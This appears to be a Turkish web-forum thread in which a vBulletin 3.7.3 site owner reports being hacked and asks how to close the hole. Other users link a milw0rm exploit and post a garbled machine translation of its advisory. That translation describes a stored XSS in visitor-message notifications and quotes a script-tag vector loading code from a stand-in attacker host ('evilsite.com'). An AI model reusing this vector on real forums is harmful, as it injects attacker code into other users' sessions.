Vbulletin 3.7.3 Açıgı Dikkat

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    MosgzA
    MosgzA's avatar
    Kayıt Tarihi: 26/Şubat/2009
    Erkek

    arkadaşlar 2 qün önce vbulletin kullandıgım için hack yedim. hackleyen kişiye ulaştım tabi .. ve sonuçta includes klasöründeki class_dm_moderator.php isimli dosyayı silmem gerektigini söyledi sildim ve açık kapandı dedi. ki ne kadar dogru bilinmez bu konu hakkında bilgisi olan varmı bana bol bol yazı gönderiyordu şu şekilde

     

     [options]
    Edit
    Delete
    CHMOD
    Rename
    Download
    Copy 19.33 kb metalhead/metalhead -rw-r--r--
    2 class_dm_deletionlog.php [options]


    www.metalheadtr.com | www.doom-metal.org
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    MosgzA
    MosgzA's avatar
    Kayıt Tarihi: 26/Şubat/2009
    Erkek
    bu arada linux serverda işe yarıyormuş windows serveerda yaramıyormuş

    www.metalheadtr.com | www.doom-metal.org
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    bychaos
    bychaos's avatar
    Kayıt Tarihi: 03/Nisan/2007
    Erkek

    http://www.milw0rm.com/exploits/7174

     

    Açık bu arkadaşlarda bunun tam açılımını yapabilecek bi arkadaş varmı ?


    İyi bir kalça sahibi olmanın, iyi bir kafa sahibi olmaktan daha fazla prim yaptığı bir ülkede, hiçbir şey daha ileriye gitmez. . Can Dündar.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    PsychoDawn
    PsychoDawn's avatar
    Kayıt Tarihi: 01/Nisan/2007
    Erkek

    bychaos bunu yazdı:
    -----------------------------

    http://www.milw0rm.com/exploits/7174

     

    Açık bu arkadaşlarda bunun tam açılımını yapabilecek bi arkadaş varmı ?


    -----------------------------
    Xss olduğu herhalinden belli

    üsteki yazıyı çevittirebilsek düzgün bir şekilde  gerisi gelir zaten . :)

  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    tbtgezgini
    tbtgezgini's avatar
    Kayıt Tarihi: 12/Haziran/2007
    Erkek

    yoyo bunu yazdı:
    -----------------------------

    bychaos bunu yazdı:
    -----------------------------

    http://www.milw0rm.com/exploits/7174

     

    Açık bu arkadaşlarda bunun tam açılımını yapabilecek bi arkadaş varmı ?


    -----------------------------
    Xss olduğu herhalinden belli

    üsteki yazıyı çevittirebilsek düzgün bir şekilde  gerisi gelir zaten . :)


    -----------------------------

    çevirtilmiş hali;

     Açıklama = kritik bir güvenlik açığı, yeni vBulletin 3.7.3 yazılım olarak dahil gelir var 
    + with the visitor messages addon (a clone of a social network wall/comment area). Bir sosyal ağ duvarın ziyaretçi mesajları addon ile + (bir klon / yorum alan).
    - When posting XSS, the data is run through htmlentities(); before being displayed - Ne zaman XSS ilanıyla, veri htmlentities ile çalıştırılan (); önce gösterilir
    + to the general public/forum members. + Genel kamu / forum üyelerine. However, when posting a new message, Ancak, yeni bir mesaj gönderme
    - a new notification is sent to the commentee. - Yeni bir bildirim ve commentee gönderilir. The commenter posts a XSS vector such as Bu yorumcu gibi bir XSS vektör mesajlar
    + <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php + <script src="http://evilsite.com/nbd.js">, ve ne zaman commentee usercp.php ziyaret
    - under the domain, they are hit with an unfiltered xss attach. Etki alanı - altında bir Filtrelenmemiş XSS iliştirebilirsiniz ile isabet bulunmaktadır. XSRF is also readily available XSRF de kolaylıkla kullanılabilir
    + and I have included an example worm that makes the user post a new thread with your own + Ve bu kullanıcı kendi yeni bir iplik sonrası kılan bir örnek solucan yer var
    - specified subject and message. - Belirtilen konu ve mesaj.

     


    ...
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    MosgzA
    MosgzA's avatar
    Kayıt Tarihi: 26/Şubat/2009
    Erkek
    beyler bu açıgı nasıl kapatırız bileniniz varmı

    www.metalheadtr.com | www.doom-metal.org
Toplam Hit: 3364 Toplam Mesaj: 6